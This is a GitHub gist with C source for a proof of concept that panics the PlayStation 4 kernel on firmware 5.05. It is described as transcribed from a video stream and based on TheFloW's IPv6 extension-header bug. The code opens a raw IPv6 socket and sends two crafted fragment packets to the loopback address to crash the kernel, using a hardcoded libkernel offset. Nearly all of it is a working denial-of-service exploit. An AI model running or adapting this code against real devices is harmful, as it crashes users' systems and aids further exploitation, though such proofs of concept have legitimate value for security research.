Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Transcription to C of Specter's video stream of him coding PS4 FW 5.05 kernel panic PoC using TheFloW's IP6_EXTHDR_CHECK XNU PoC
#define AF_INET6 28
#define SOCK_RAW 3
#define IPPROTO_HOPOPTS 0
#define IPPROTO_IPV6 41
#define IPPROTO_FRAGMENT 44
#define IPPROTO_ICMPV6 58
#define IPPROTO_DSTOPTS 60
#define IPPROTO_RAW 255
#define IP6OPT_PADN 1
#define IP6F_MORE_FRAG 0x100
static void try_df_kpanic() {
printf("Your PS4 will have a kernel panic soon...");
int sock = libkernel_sys_socket(AF_INET6, SOCK_RAW, IPPROTO_HOPOPTS);
printf("sock = %i", sock);
uint64_t addr = (uint64_t)malloc(0x1C);
write1(addr + 0x01, AF_INET6); // sockaddr_in6->sin6_family
write2(addr + 0x02, 0); // sockaddr_in6->sin6_port
// offset to inet_pton: 5.05 libkernel (0x11250)
int(*inet_pton)(int af, const char * restrict src, void * restrict dst) = (int(*)(int, const char * restrict, void * restrict))(libkernel_base + 0x11250);
inet_pton(AF_INET6, "::1", (void *)(addr + 0x08));
uint64_t packet1 = (uint64_t)malloc(0x18);
for (int i = 0; i < 0x18; i += 4)
write4(packet1 + i, 0x41414141);
write1(packet1 + 0x00 + 0x00, IPPROTO_FRAGMENT);
write1(packet1 + 0x00 + 0x01, 0);
write1(packet1 + 0x02 + 0x00, IP6OPT_PADN);
write1(packet1 + 0x02 + 0x01, 4);
write1(packet1 + 0x08 + 0x00, IPPROTO_DSTOPTS);
write1(packet1 + 0x08 + 0x01, 0);
write2(packet1 + 0x08 + 0x02, IP6F_MORE_FRAG);
write4(packet1 + 0x08 + 0x04, 0x1337);
write1(packet1 + 0x10 + 0x00, IPPROTO_ICMPV6);
write1(packet1 + 0x10 + 0x01, 1);
write1(packet1 + 0x12 + 0x00, IP6OPT_PADN);
write1(packet1 + 0x12 + 0x01, 4);
uint64_t packet2 = (uint64_t)malloc(0x28);
for (int i = 0; i < 0x28; i += 4)
write4(packet2 + i, 0x42424242);
write1(packet2 + 0x00 + 0x00, IPPROTO_FRAGMENT);
write1(packet2 + 0x00 + 0x01, 0);
write1(packet2 + 0x02 + 0x00, IP6OPT_PADN);
write1(packet2 + 0x02 + 0x01, 4);
write1(packet2 + 0x08 + 0x00, IPPROTO_DSTOPTS);
write1(packet2 + 0x08 + 0x01, 0);
write2(packet2 + 0x08 + 0x02, 0x800);
write4(packet2 + 0x08 + 0x04, 0x1337);
write1(packet2 + 0x10 + 0x00, IP6OPT_PADN);
write1(packet2 + 0x10 + 0x01, 6);
int rv1 = libkernel_sys_sendto(sock, (void *)packet1, 0x18, 0, (sockaddr *)addr, 0x1C);
printf("rv1 = %i", rv1);
wait(3 * 1000 * 1000);
// Trigger kernel panic
int rv2 = libkernel_sys_sendto(sock, (void *)packet2, 0x28, 0, (sockaddr *)addr, 0x1C);
printf("rv2 = %I", rv2);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment